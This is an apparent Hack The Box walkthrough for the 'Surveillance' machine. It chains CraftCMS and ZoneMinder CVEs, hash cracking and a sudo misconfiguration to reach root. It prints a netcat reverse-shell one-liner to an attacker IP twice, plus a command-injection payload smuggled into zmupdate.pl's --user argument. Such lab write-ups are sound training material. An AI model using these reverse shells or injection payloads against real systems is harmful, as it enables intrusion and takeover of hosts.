HTB Surveillance: Walkthrough

We start off with exploiting a CVE in a vulnerable CraftCMS running on the target webserver. This is then followed by a series of 3 privilege escalations. The first requiring us to download a backup SQL db .zip file containing an old users hash, which we can crack to gain SSH into the machine. The second involves another CVE on a ZoneMinder instance running on the targets localhost. Finally, we can abuse a misconfiguraton in our sudo privileges to gain access as the root user.

0) Machine Overview

1. Scans
2. Web Enumeration
3. Privilege Escalation
4. Privilege Escalation 2
5. Privilege Escalation 3

1) Scans

22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)

80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://surveillance.htb/

8181/tcp open  http    SimpleHTTPServer 0.6 (Python 3.10.12)

8888/tcp open  http    SimpleHTTPServer 0.6 (Python 3.10.12)
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)

2) Web Enumeration

Seems we’re dealing with CraftCMS:

With a bit of research, we come across a PoC for a CVE that happened recently.

If we exploit it using this script, we’re able to get a “web-shell”. (Just to note, you’ll have to have Burpsuite running as the exploit connect to your proxy at first for this script to work.)

Now that we’re in, we need to find a way to leverage this web-shell to get a full reverse shell or an SSH connection.

After various attempts to catch the shell, this command worked the best, giving us a very nice shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f

3) Privilege Escalation

Now to privilege escalate.

Now before I try loading linPEAS or anything like that onto the machine, I like to manually enumerate a little bit and check for low-hanging fruit and look through config files.

• No interesting SUID files.
• Cant access any of the other users home directories.
• We have 2 users with home directories.

Lets start looking through the CMS files and see if we can find anything interesting….

Hmm a .env file. Thats definitely interesting.

Seems theres a MySQL DB running on the host.. and potentially another webserver on port 8080? We’ll have to check that out afterwards, maybe through a portforward.

I tried connecting to the DB, but it basically just kept hanging every time. So I just decided to upload a metty.elf file and get a meterpreter shell.

Now we are able to successfully access the DB.

As we can see, there is a bcrypt hash belonging to the admin user, who also seems to be Matthew. Lets try hacking that hash offline, although I’m not too confident.

After a while of trying to crack it, it seems like this wasn’t the intended route.

After some more enumeration, we find a backup .zip file.

Lets take that offline and take a look.

Jackpot. Another hash for Matthew, which seems to be SHA-256. Now to crack it.

Lets try SSHing into the machine as matthew.

4) Privilege Escalation 2

Now that we’re on matthew, we can again check for low-hanging fruit. In this case, I didn’t find any in this case, so lets run linpeas.

Interesting. I checked GTFOBins to see if there was a quick win, as I’m not that familiar with abusing capabilities.

Lets give it a try:

So it seems like because the python3 file is owned by zoneminder, we cant run it unless we are that user. (Note: I’m writing this after completing the box. I think that the reason it didn’t work was because that capability is basically like a SUID, and because the file is owned by zoneminder. Either way, I tried to specify the UID of zoneminder’s, but it kept giving me access denied.)

One other thing to note is that, in our linpeas output, it mentions something about that server running on 8080.

Seems like its running PHP within an nginx webserver. Lets port forward now. (This command will allow us to access port 8080 on our local machines port 1234)

Now if we go back and look at the zoneminder.conf file a little more, we’ll notice that the webroot is at:

Interesting, lets check out that db folder.

So it seems its showing a list of version updates that were made to the zoneminder application. Seems like its currently running v1.36.9 or some version along those lines. Lets check for a CVE.

Looks like our version would fall within that range, so we can try looking for a PoC, which in this case, there happen to be a few, so I’ll be using this one.

5) Privilege Escalation 3

Now that we’re zoneminder, our final goal is close within reach. We can run a quick sudo -l and see if there is a quick win, hopefully without requiring a password.

So after quite a bit of research and messing with the various zm*.pl files there are, we can leverage zmupdate.pl to basically pass a script to get executed as the username in one of the command parameters, and we’ll need to use a password that we can find in a database.php file: (Note: don’t think the password is actually needed for this exploit)

So the final command will look like this:

sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/revshell.sh)' --pass=ZoneMinderPassword2023

I had to try multiple reverse shells, the one that worked for me was: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.14 5555 >/tmp/f